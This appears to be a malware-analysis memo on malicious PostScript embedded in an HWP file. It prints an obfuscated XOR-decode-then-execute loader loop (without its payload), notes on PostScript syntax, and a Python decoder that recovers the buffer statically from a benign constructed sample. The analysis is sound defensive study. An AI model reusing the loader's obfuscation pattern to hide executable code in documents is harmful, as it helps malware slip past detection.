Malicious postscript code in hwp
I found an HWP (Hangul Word Processor) file which contains malicious PostScript code. I am taking some analysis notes as a memo. The malicious PostScript code is as follows.

    /X240 def %kshvudgsjsye3
    0 1 X240 length 1 sub % %kshvudgsjsye3
    {/Y31 exch 1 2 and pop def %kshvudgsjsye3
    X240 dup Y31 get Y31 15 and /Y104 8 def get xor Y31 exch put} for
    X240 cvx % exec

I’ve googled and found some coding rules.

・Anything following a % on a PostScript program line is ignored by the interpreter.
・Initialize variable i with value 0: /i 0 def
・Set each element of array ar to value n: 0 1 ar length 1 sub {ar exch n put} for
・exch: Exchange the top two values of the stack.
・dup: Duplicate the top element of the stack.
・Logical 'and' operator: a&&b is written as a b and
・<hexadecimal string> cvx makes the string executable
・<hexadecimal string> cvx exec ...
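The loop above XORs each byte of the X240 buffer with an entry selected by `Y31 15 and`, then passes the buffer to cvx. As an added example (not code from the original post), the Python below recovers that buffer statically so the decoded stage can be read without running it in an interpreter. It assumes the encoded buffer and a 16-byte key are hex string literals at the positions shown in the constructed sample; the key, the payload and the function names are made up for illustration.

```python
import re

HEX = re.compile(r"<([0-9A-Fa-f\s]*)>")

def strip_comments(ps):
    # '%' comments run to end of line; this loader shape has no (...) strings.
    return "\n".join(line.split("%", 1)[0] for line in ps.splitlines())

def hex_literal(body):
    digits = "".join(body.split())      # whitespace inside <...> is ignored
    if len(digits) % 2:                 # an odd trailing digit is padded with 0
        digits += "0"
    return bytes.fromhex(digits)

def decode_loader(ps):
    """Recover the bytes the loop leaves in the buffer, without running them."""
    src = strip_comments(ps)
    target = re.search(r"(\w+)\s+cvx\b", src)           # buffer handed to cvx
    loop = re.search(r"\{(.*?)\}\s*for\b", src, re.S)   # body of the for loop
    if not target or not loop:
        raise ValueError("not the loader shape described in the post")
    name, body = re.escape(target.group(1)), loop.group(1)
    definition = re.search(r"/" + name + r"\s*<([0-9A-Fa-f\s]*)>\s*def\b", src)
    key_lit = HEX.search(body)                          # assumed inline key
    mask = key_lit and re.search(r"\b(\d+)\s+and\b", body[key_lit.end():])
    if not definition or not mask:
        raise ValueError("encoded buffer, key or index mask not found")
    encoded, key = hex_literal(definition.group(1)), hex_literal(key_lit.group(1))
    m = int(mask.group(1))              # integer 'and' is bitwise: i & 15
    if m >= len(key):
        raise ValueError("key shorter than the index mask allows")
    return bytes(b ^ key[i & m] for i, b in enumerate(encoded))

# Constructed sample: a harmless stand-in payload under a made-up key, wrapped
# in the loop from the post with the two hex literals placed where assumed.
KEY = bytes(range(0x41, 0x51))
PLAIN = b"(benign stand-in for the decoded stage) print"
ENC = bytes(b ^ KEY[i & 15] for i, b in enumerate(PLAIN))
SAMPLE = f"""/X240 <{ENC.hex()}> def %kshvudgsjsye3
0 1 X240 length 1 sub % %kshvudgsjsye3
{{/Y31 exch 1 2 and pop def %kshvudgsjsye3
X240 dup Y31 get <{KEY.hex()}> Y31 15 and /Y104 8 def get xor Y31 exch put}} for
X240 cvx % exec
"""

if __name__ == "__main__":
    print(decode_loader(SAMPLE).decode("latin-1"))
```

The junk tokens (`1 2 and pop`, `/Y104 8 def`) and the trailing `%` comments do not affect the result, which is why the decoder skips comments and reads the index mask only after the key literal.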